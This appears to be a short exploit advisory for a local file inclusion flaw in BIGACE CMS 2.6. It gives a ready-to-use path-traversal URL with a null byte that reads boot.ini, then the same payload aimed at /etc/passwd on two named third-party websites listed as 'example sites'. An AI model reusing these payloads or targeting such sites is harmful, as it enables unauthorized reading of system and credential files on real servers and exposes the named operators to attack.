BIGACE CMS version 2.6 suffers from a local file inclusion vulnerability.
373a39d3d8107da04c7897748d4903e1747606f67c303cbde3e17d468ecd8e30
-----------------:LFI:----------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------
script : BIGACE 2.6
download : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip
Author : CWD@rBe
Special Thanks : www.cyber-warrior.org
***************************************************************************************************************
exploit:
http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len
example sites
1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
****************************************************************************************************************